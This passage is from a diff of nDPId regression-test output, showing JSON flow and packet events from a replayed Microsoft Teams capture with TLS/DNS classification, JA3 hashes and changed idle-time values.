-00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1156,"source":"teams.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1587041682423,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041682423,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0HMFAAGwGr7I0ckwwwKgBBgG77ICUvjjErrIu7YAS\/\/+TZQAAAgQFoAEDAwgBAQQC"} 
-00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1157,"source":"teams.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1587041682423,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041682423,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAG+H\/AqAEGNHJMMOyAAbuusi7tlL44xVAQIAC0JAAA"} -00878{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1158,"source":"teams.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041682376,"flow_last_seen":1587041682423,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":236,"flow_tot_l4_payload_len":236,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1587041682423,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.76.48","src_port":60544,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"northeurope.notifications.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1124,"source":"teams.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682376,"flow_last_seen":1587041682376,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041682376,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.76.48","src_port":60544,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1124,"source":"teams.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1587041682376,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041682376,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG+GfAqAEGNHJMMOyAAbuusi7sAAAAALAC\/\/9JyAAAAgQFtAEDAwUBAQgKMISuhQAAAAAEAgAA"} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1153,"source":"teams.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1587041682420,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041682420,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8cKZAAGwGWtQ0ck0hwKgBBgG77H8VHmMl9rF6B6ASIAAZOgAAAgQFoAEDAwgEAggKYQa0RDCEroA="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1154,"source":"teams.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1587041682420,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041682420,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG94LAqAEGNHJNIex\/Abv2sXoHFR5jJoAQEAlXvgAAAQEICjCErqxhBrRE"} 
+00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1155,"source":"teams.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041682369,"flow_last_seen":1587041682420,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041682420,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60543,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1156,"source":"teams.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1587041682423,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041682423,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0HMFAAGwGr7I0ckwwwKgBBgG77ICUvjjErrIu7YAS\/\/+TZQAAAgQFoAEDAwgBAQQC"} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1157,"source":"teams.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1587041682423,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041682423,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAG+H\/AqAEGNHJMMOyAAbuusi7tlL44xVAQIAC0JAAA"} 
+00878{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1158,"source":"teams.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041682376,"flow_last_seen":1587041682423,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":236,"flow_tot_l4_payload_len":236,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1587041682423,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.76.48","src_port":60544,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"northeurope.notifications.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00822{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1159,"source":"teams.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1587041682440,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":321,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":321,"pkt_l4_len":287,"thread_ts_msec":1587041682440,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWrCABFAAEzES9AAEARZ+LAqAAB\/\/\/\/\/wBEAEMBHwAAAQEGAHT\/ICoAAIAAAAAAAAAAAAAAAAAAAAAAANgNF9ZVqwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwIBAwwJVEwtU0cxMTZFPAlUTC1TRzExNkU9BwHYDRfWVav\/"} 
-01502{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1185,"source":"teams.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1587041682369,"flow_last_seen":1587041682557,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4409,"flow_avg_l4_payload_len":489,"midstream":0,"thread_ts_msec":1587041682557,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60543,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}} 
+01502{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1185,"source":"teams.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1587041682369,"flow_last_seen":1587041682557,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4409,"flow_avg_l4_payload_len":489,"midstream":0,"thread_ts_msec":1587041682557,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60543,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}} 00182{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":1189,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041682611} 
00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":1189,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041682598,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1193,"source":"teams.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682668,"flow_last_seen":1587041682668,"flow_idle_time":180000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1587041682668,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":57530,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
@@ -168,41 +168,41 @@ 00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1193,"source":"teams.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682668,"flow_last_seen":1587041682668,"flow_idle_time":180000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1587041682668,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":57530,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Web"},"dns": {"query":"presence.services.sfb.trafficmanager.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1201,"source":"teams.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1587041682697,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":181,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":181,"pkt_l4_len":147,"thread_ts_msec":1587041682697,"pkt":"KDc3AG3IEBMx8Tl2CABFAACny9dAADkR8hbAqAEBwKgBBgA14LoAkwAALzeBgAABAAIAAAAACHByZXNlbmNlCHNlcnZpY2VzA3NmYg50cmFmZmljbWFuYWdlcgNuZXQAAAEAAcAMAAUAAQAAASwANRRhLXVwcy1wcmVzZW5jZTQtcHJvZAtub3J0aGV1cm9wZQhjbG91ZGFwcAVhenVyZQNjb20AwEYAAQABAAAABgAENHJNOg=="} 
00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1201,"source":"teams.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041682668,"flow_last_seen":1587041682697,"flow_idle_time":180000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1587041682697,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":57530,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Web"},"dns": {"query":"presence.services.sfb.trafficmanager.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.114.77.58"}} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1202,"source":"teams.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682698,"flow_last_seen":1587041682698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041682698,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.58","src_port":60545,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1202,"source":"teams.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1587041682698,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041682698,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG913AqAEGNHJNOuyBAbtgCOGqAAAAALAC\/\/\/jdgAAAgQFtAEDAwUBAQgKMISvtwAAAAAEAgAA"} 
-00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1208,"source":"teams.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682740,"flow_last_seen":1587041682740,"flow_idle_time":7440000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":233,"midstream":1,"thread_ts_msec":1587041682740,"l3_proto":"ip4","src_ip":"162.125.19.131","dst_ip":"192.168.1.6","src_port":443,"dst_port":60344,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00785{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1208,"source":"teams.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1587041682740,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":299,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":299,"pkt_l4_len":265,"thread_ts_msec":1587041682740,"pkt":"KDc3AG3IEBMx8Tl2CABFAAEdws9AADEGDl2ifRODwKgBBgG767gSqyGfi6a7DoAYAWi65wAAAQEICpHNoqswhBBbFwMDAOQAAAAAAAAACKmKftpP18TObpudfRHF+x2Q26rJbEiP394UtjZJPj4wSIR\/hp3JlNrAGtpUw45IgQ+\/Td3gBgwIaydoMxwS3i93S6aIvQahVpj\/c5RwIn5XTgvMLlxphbaNgBQKVcUBzOyFCFmX25bboaZrE8yGPewBV8YF9rPw3wiL2qX6gOrVwGBD+SxN5WBWFI2hGO+JWJUmRSYMjHC+44xSTFiyxGwuYeySW1fNosn1ZrrnxmEfRHvkqjQUYvkmRW87MNYmA\/nzpUUAJUjx7fyAlsSNV0cWWtSO31yX1lU5orE="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1209,"source":"teams.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1587041682740,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041682740,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGwxXAqAEGon0Tg+u4AbuLprsOEqsiiIAQD\/hw3AAAAQEICjCEr+CRzaKr"} 
-00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1210,"source":"teams.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1587041682744,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041682744,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA09YRAAGwG1eQ0ck06wKgBBgG77IG+FZNKYAjhq4AS\/\/+qaAAAAgQFoAEDAwgBAQQC"} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1211,"source":"teams.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1587041682744,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041682744,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAG93XAqAEGNHJNOuyBAbtgCOGrvhWTS1AQIADLJwAA"} -00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1212,"source":"teams.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041682698,"flow_last_seen":1587041682744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":219,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1587041682744,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.58","src_port":60545,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"presence.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
-01289{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1213,"source":"teams.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1587041682745,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":665,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":665,"pkt_l4_len":631,"thread_ts_msec":1587041682745,"pkt":"EBMx8Tl2KDc3AG3ICABFAAKLAABAAEAGwL7AqAEGon0Tg+u4AbuLprsOEqsiiIAYEAA0LgAAAQEICjCEr+ORzaKrFwMDAlK2BaXSajSAVWEKj3frXxijYpT3GD2Cuos6bxaeeEb0O6UJhzmzPZI\/SWy+fgBnTfneCwusduYkx4s3F4xCn2MY3DEvpr\/P48ATzKlJ++OHqI7OI3KpokJ1bF8YwJjJpFyWkPT0\/gdDA2C0thwexYlLgVCHe4dECfAKO3ai6a9AkpIGftSCmWnSsB7\/GodcDd1wDIWHn+mS6A9bTO\/2sRCfLQjmwaqnM\/0Kd1DorrQMm9TT6\/w11NzOyGJGqVRWfthWKCJ2r5CEFaogXR64MxPpr2FM6spcuDUY4C3Hc53Q7uc97BndljPBEgsGGu2WIs1hpBKyBrbp4cakeWFrgRHILDge\/JLjoB\/we0ie6rPfHdzAzbH+CVHboc7ECVvIV6N2Rd\/z5fI6cJ5y1i\/CGpe9JS\/DjF+npNlL3gVvBs3y7VpT4ziTRBRlbzG6hzfaYWVE\/I1GNwloup0kRP0\/\/fFg59buQBmTxdHJsfm4laPDQEGg2\/E9TD5wbcmagME1tYB8Z6HaDDAe1MbrBXtLSM8VMS0ZeI23LZfgw6dIscXGQh+EZCVohYQ2K\/dCOtZqYIGlXsZd11O+bX\/KPVaVnsGCQqimWVbYkJXTdkE5fdL4ibwUdj8vI7+8IXUv8oArxAdVEWB2+pth6d9Zti7C4SxMlmajA50jkJHElO8G4w6Wzb86qkyK4WbkuYLazUSRxEvrQrVtZjtDDcEAhbB3i\/CCiXoyK9403MAI7UV+NXn0+Iqmacnoi+GSVKkccDjbrlFQ3qxHSBpnh\/Zt22FSB4TV4eA="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1249,"source":"teams.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682809,"flow_last_seen":1587041682809,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041682809,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"167.99.215.164","src_port":60546,"dst_port":4434,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1249,"source":"teams.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1587041682809,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041682809,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG+gHAqAEGp2PXpOyCEVImrEWfAAAAALAC\/\/+rgAAAAgQFtAEDAwUBAQgKMISwIQAAAAAEAgAA"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1298,"source":"teams.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1587041682862,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041682862,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGBganY9ekwKgBBhFS7ILLfLe3JqxFoKAS\/ogNbwAAAgQFrAQCCAoTeRnVMISwIQEDAwc="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1299,"source":"teams.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1587041682862,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041682862,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+g3AqAEGp2PXpOyCEVImrEWgy3y3uIAQECwqYQAAAQEICjCEsFATeRnV"} 
-01040{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1300,"source":"teams.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041682809,"flow_last_seen":1587041682863,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1587041682863,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"167.99.215.164","src_port":60546,"dst_port":4434,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dati.ntop.org","ja3":"7120d65624bcd2e02ed4b01388d84cdb","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01094{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1345,"source":"teams.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1587041682809,"flow_last_seen":1587041682917,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":669,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1587041682917,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"167.99.215.164","src_port":60546,"dst_port":4434,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"dati.ntop.org","ja3":"7120d65624bcd2e02ed4b01388d84cdb","ja3s":"410b9bedaf65dd26c6fe547154d60db4","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00873{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1439,"source":"teams.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1587041682698,"flow_last_seen":1587041683109,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":9547,"flow_avg_l4_payload_len":298,"midstream":0,"thread_ts_msec":1587041683109,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.58","src_port":60545,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": 